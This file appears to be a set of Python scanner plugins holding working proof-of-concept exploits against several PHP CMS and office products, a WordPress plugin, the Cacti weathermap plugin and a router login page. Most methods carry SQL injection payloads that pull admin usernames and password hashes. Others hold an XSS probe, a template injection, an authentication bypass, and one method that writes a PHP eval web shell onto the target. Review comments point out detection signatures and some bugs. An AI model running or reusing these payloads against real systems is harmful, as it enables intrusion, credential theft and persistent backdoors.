            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            s = requests.session()
            url = self.target + "/index.php"
            # First GET primes the session; its response is overwritten below.
            r = s.get(url)
            header = {
                "X-Forwarded-For": "' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,md5(c),user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"
            }
            r = s.get(url, headers=header)
            # md5("c").
            if r.status_code == 200 and '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞;\n具体请查看漏洞详情'.format(
                    target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Marker-based check against ``/admin.php?ac=duty``.

        Primes a session on the target, GETs the ``duty`` action with a
        ``number`` parameter embedding ``md5(c)`` and reports the
        vulnerability when the response contains md5("c"),
        ``4a8a08f09d37b73795649038408b5f33``. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # After logging in as a front-end user.
            # NOTE(review): no credentials are supplied; s.get() only primes the session.
            s = requests.session()
            s.get(self.target)
            payload = "/admin.php?ac=duty&fileurl=duty&menuid=31&number=123%20and%20(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(username,md5(c))%20FROM%20toa_user%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)"
            url = self.target + payload
            r = s.get(url)

            # md5("c").
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Marker-based check against ``/dede/member/buy_action.php``.

        GETs the endpoint to prime the session, POSTs a raw ``product``
        body embedding ``md5(c)`` and reports the vulnerability when the
        status is 200 and the body contains md5("c"),
        ``4a8a08f09d37b73795649038408b5f33``. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # The vulnerability requires a logged-in member.
            # NOTE(review): no login is performed here; the GET below only primes the session.
            s = requests.session()
            payload = '/dede/member/buy_action.php'
            # `#@__admin` is left as written; the target is expected to expand
            # the `#@__` table prefix — TODO confirm.
            data = """product=1141056911' and char(@') and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (concat(0xC3DCC2EB,userid,0x3a,md5(c))) from #@__admin limit 0,1),1,62)))a from information_schema.tables group by a)b))#"""
            url = self.target + payload
            s.get(url)
            r = s.post(url, data=data)

            # md5("c").
            if r.status_code == 200 and '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def exploit(self):
        """Marker-based check against ``/virtual-office/offer.php``.

        Sends a multipart POST (``files=`` with a ``(None, '0.00')`` tuple)
        whose field name embeds ``md5(c)``, without following redirects,
        and reports the vulnerability when the response contains md5("c"),
        ``4a8a08f09d37b73795649038408b5f33``. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            s = requests.session()
            payload = '/virtual-office/offer.php'
            # (None, value) tuples make requests emit a plain multipart field
            # with no filename; the key itself is the payload carrier.
            data = {
                'data[trade][price FROM pb_thk_trades where 1=1 and (select 1 from (select count(*),concat(md5(c),floor(rand(0)*2))x from information_schema.tables group by x)a)#]': (None, '0.00')
            }
            url = self.target + payload
            r = s.post(url, files=data, allow_redirects=False)

            # md5("c").
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                    target=self.target, name=self.vuln.name, url=url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Marker-based check against ``/admin.php?ac=conference``.

        Primes a session on the target, GETs the ``keys`` action with an
        ``id`` parameter embedding ``md5(c)`` and reports the vulnerability
        when the response contains md5("c"),
        ``4a8a08f09d37b73795649038408b5f33``. Exceptions are logged via
        ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Log in as any user.
            # NOTE(review): no credentials are supplied; s.get() only primes the session.
            s = requests.session()
            s.get(self.target)
            payload = "/admin.php?ac=conference&fileurl=administrative&do=keys&id=123%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28SELECT%20distinct%20concat%28username,md5(c)%29%20FROM%20toa_user%20LIMIT%200,1%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29"
            url = self.target + payload
            r = s.get(url)

            # md5("c").
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Marker-based check against ``/index.php?ac=news_all``.

        Primes a session on the target, then fetches the ``yz`` query
        embedding ``md5(c)`` with a plain ``requests.get`` (not the
        session), and reports the vulnerability when the response contains
        md5("c"), ``4a8a08f09d37b73795649038408b5f33``. Exceptions are
        logged via ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Register a user.
            # NOTE(review): no registration is performed; s.get() only primes the session.
            s = requests.session()
            s.get(self.target)
            payload = '/index.php?ac=news_all&yz=1%20union%20select%20group_concat%28username,0x23,md5%28c%29%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%20from%20tc_user%23'
            url = self.target + payload
            # Module-level requests.get(): the session primed above, and any
            # cookies it holds, are not used for this request.
            r = requests.get(url)

            # md5("c").
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Probe ``self.target`` for the template/path-handling issue this plugin covers.

        After normalising the target with the ``base_path`` option, a single
        GET is sent to the ``/yp/business/`` endpoint and a finding is reported
        when the response is HTTP 200 and its body contains ``'system'``. All
        exceptions are logged via ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # "Register an enterprise user, log in, then verify" (original
            # comment). Only a plain GET to the target is issued here; no
            # registration or login request is visible in this method.
            s = requests.session()
            s.get(self.target)
            # NOTE(review): ``o`` is assigned but never used in this method.
            o = urllib.parse.urlparse(self.target)
            # The query string carries a traversal-style ``file=`` value and an
            # inline PHP fragment in ``template=``; both are distinctive enough
            # to serve as detection signatures in access logs.
            payload = "/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php phpinfo();exit();?>"
            url = self.target + payload
            r = s.get(url)

            # NOTE(review): 'system' is a weak marker -- any ordinary page that
            # happens to contain the word will satisfy this check, so this
            # verifier is prone to false positives.
            if r.status_code == 200 and 'system' in r.text:
                self.output.report(
                    self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                        target=self.target, name=self.vuln.name, url=url))

        except Exception as e:
            # Broad catch: all failures become a single info line.
            self.output.info('执行异常{}'.format(e))
 def verify(self) -> None:
     """Probe ``self.target`` for the weathermap ``editor.php`` file-write issue.

     A GET to ``editor.php`` with a time-derived ``mapname`` and a PHP literal in
     ``map_title`` is sent; on HTTP 200 the expected output path under
     ``plugins/weathermap/configs/`` is handed to ``self.check_my_shell`` and a
     finding is reported when that helper returns a truthy value. The resulting
     path is also printed to stdout. All exceptions are logged through
     ``self.output.info`` and swallowed.

     NOTE(review): ``file`` is always ``None`` here, so the branch that reads
     the payload from disk is dead code; ``shell_text`` is always the inline
     literal. The method's indentation (1 space for ``def``) differs from the
     rest of the file.
     """
     self.target = self.target.rstrip('/') + '/' + (
         self.get_option('base_path').lstrip('/'))
     try:
         self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
             target=self.target, vuln=self.vuln))
         url = self.target
         shell_text = "Gif89a <?php @eval($_POST['wooyun']);?>"
         file = None
         try:
             # Dead branch: ``file`` is hard-coded to None two lines above.
             if not (file is None):
                 shellfile = open(file, 'rb')
                 shell_text = shellfile.read()
                 shellfile.close()
         except Exception as e:
             # Message is misleading for non-file errors; ``e`` is not logged.
             self.output.info("File Not Found.")
             return
         # Requests to editor.php carrying ``action=set_map_properties`` with
         # PHP tags in ``map_title`` are a clear detection signature; the
         # ``configs/<epoch>.php`` file name pattern is another.
         temp_url = "{target_url}/plugins/weathermap/editor.php?plug=0&mapname={shell_name}&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=<?php echo md5(666);?>{shell_content}&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=NameH"
         # File name is the current epoch second, so repeated runs within the
         # same second collide and a run never cleans up what it wrote.
         timetemp = time.time()
         tmp_file_name = str(int(timetemp)) + ".php"
         s = requests.session()
         res = s.get(
             temp_url.format(target_url=url,
                             shell_name=tmp_file_name,
                             shell_content=shell_text))
         if res.status_code == 200:
             check_shell = url + \
                 "/plugins/weathermap/configs/{shell_name}".format(
                     shell_name=tmp_file_name)
             # ``check_my_shell`` is defined elsewhere in the project; it is
             # presumably a reachability check on the written path -- confirm.
             flag = self.check_my_shell(check_shell)
             if flag:
                 self.output.report(
                     self.vuln,
                     '发现{target}存在{name}漏洞'.format(target=self.target,
                                                   name=self.vuln.name))
                 # NOTE(review): bypasses ``self.output`` and writes to stdout.
                 print(("SHELL: " + check_shell))
     except Exception as e:
         self.output.info('执行异常:{}'.format(e))
    def verify(self) -> None:
        """Probe ``self.target`` for the ``member/pm.php`` SQL-injection issue.

        A GET to the endpoint is issued first (presumably to obtain a session
        cookie -- no credentials are submitted despite the login note below),
        then a POST whose body is a raw string. A finding is reported when the
        response is HTTP 200 and contains the expected digest. All exceptions
        are logged via ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # "The issue requires member login" (original comment). No login
            # request is visible in this method.
            s = requests.session()
            payload = '/dede/member/pm.php'
            # ``data`` is a str, so requests sends it verbatim as the POST body
            # with no form-encoding; the leading '?' is part of the body text.
            # The embedded ``md5(c)`` / ``floor(rand(0)*2)`` pattern and the
            # digest checked below are usable detection signatures.
            data = "?dopost=read&id=1' and @`'` and (select 1 from (select count(*),concat(md5(c),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"
            url = self.target + payload
            s.get(url)
            r = s.post(url, data=data)

            # 4a8a08f0... is md5('c'); its presence means the database
            # evaluated the injected expression.
            if r.status_code == 200 and '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            # Broad catch: all failures become a single info line.
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Probe ``self.target`` for the reflected-XSS issue on the ``nsp_search`` admin page.

        A GET to ``/wp-admin/admin.php`` is issued first, then a GET carrying a
        script tag in ``where1``; a finding is reported when the response is
        HTTP 200 and contains the marker string checked below. All exceptions
        are logged via ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            s = requests.session()
            payload = '/wp-admin/admin.php?where1=<script>alert(/xss/)</script>&searchsubmit=Buscar&page=nsp_search'
            verify_url = self.target + payload
            #code, head, res, errcode, _ = curl.curl(url)
            # The first response is discarded; ``r`` is immediately rebound.
            r = s.get(self.target + '/wp-admin/admin.php')
            r = s.get(verify_url)

            # NOTE(review): the marker tested here (``alert(/cscan/)``) is not
            # the string sent in ``payload`` (``alert(/xss/)``), so as written
            # this condition cannot be satisfied by a reflected payload.
            if r.status_code == 200 and '<script>alert(/cscan/)</script>' in r.text:
                # security_hole(url)
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            # Broad catch: all failures become a single info line.
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Probe ``self.target`` for the ``member/album_add.php`` SQL-injection issue.

        A GET to the endpoint is issued first (presumably for a session cookie;
        no credentials are submitted), then a POST whose body is a raw string.
        A finding is reported when the response is HTTP 200 and contains the
        expected digest. All exceptions are logged via ``self.output.info`` and
        swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # "The issue requires member login" (original comment). No login
            # request is visible in this method.
            s = requests.session()
            payload = '/dedecmsnew/member/album_add.php'
            # ``data`` is a str, so requests sends it verbatim with no
            # form-encoding. The body references ``md5(c)`` and the
            # ``dede_admin`` table; both are distinctive detection signatures.
            data = """mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(md5(c),0x5f,pwd,0x5f) FROM dede_admin where userid='admin'),'','','12333','','','1367930810','1367930810','4','image','test','3')#@`'`'"""
            url = self.target + payload
            s.get(url)
            r = s.post(url, data=data)

            # 4a8a08f0... is md5('c'); its presence means the database
            # evaluated the injected expression.
            if r.status_code == 200 and '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            # Broad catch: all failures become a single info line.
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Probe ``self.target`` for the ``user-edit.html`` SQL-injection issue.

        A plain GET to the target is issued, then a POST to ``/user-edit.html``
        whose body is a raw string; a finding (including the URL) is reported
        when the response contains the expected digest. All exceptions are
        logged via ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # "After registering user aaaaaa, edit the profile at
            # http://localhost/user-edit.html" (original comment). No
            # registration or login request is visible in this method.
            s = requests.session()
            s.get(self.target)
            payload = '/user-edit.html'
            #data = "realname=aaaaaa'&email=z%40qq.com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&`admin=super"
            # ``data`` is a str and is sent verbatim (no form-encoding). The
            # backtick-prefixed ``admin=md5(c)`` field is a usable signature.
            data = "realname=aaaaaa'&email=z%40qq.com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&`admin=md5%28c%29"
            url = self.target + payload
            # NOTE(review): uses module-level ``requests.post``, not the
            # session ``s`` above, so cookies collected by ``s`` are not sent.
            r = requests.post(url, data=data)

            # 4a8a08f0... is md5('c').
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(
                    self.vuln, '发现{target}存在{name}漏洞;\n漏洞地址为{url}'.format(
                        target=self.target, name=self.vuln.name, url=url))

        except Exception as e:
            # Broad catch: all failures become a single info line.
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Probe ``self.target`` for the ``login.cgi`` authentication-bypass issue.

        A POST with a fixed header set and a fixed form body is sent to
        ``/login.cgi``; after a one-second pause the session fetches
        ``/status.htm`` and a finding is reported when that response is HTTP
        200 and contains ``'Wireless Router Status'``. All exceptions are
        logged via ``self.output.info`` and swallowed.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            s = requests.session()
            # Hard-coded browser-like headers. Two are worth noting:
            #  - 'Cookie': 'SessionID=' sets an empty session cookie by hand,
            #    alongside the session's own cookie jar.
            #  - 'Content-Length': '84' does not match the body below; requests
            #    normally computes Content-Length from the body itself, so this
            #    value is presumably overridden -- confirm if it matters.
            headers = {
                'User-Agent':
                'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101Firefox/45.0',
                'Accept':
                'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language': 'en-US,en;q=0.5',
                'Accept-Encoding': 'gzip, deflate',
                'Referer': '{target}/login.htm'.format(target=self.target),
                'Cookie': 'SessionID=',
                'Connection': 'close',
                'Content-Type': 'application/x-www-form-urlencoded',
                'Content-Length': '84'
            }
            # Raw str body, sent verbatim. A login POST whose password field is
            # a long run of '+' characters is a distinctive log signature.
            data = 'username=Admin&password=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&submit.htm%3Flogin.htm=Send'
            payload = '/login.cgi'
            url = self.target + payload
            # NOTE(review): ``r1`` is never inspected; only the follow-up
            # status page decides the outcome.
            r1 = s.post(url, headers=headers, data=data)
            time.sleep(1)
            r2 = s.get(self.target + '/status.htm')

            if r2.status_code == 200 and 'Wireless Router Status' in r2.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            # Broad catch: all failures become a single info line.
            self.output.info('执行异常{}'.format(e))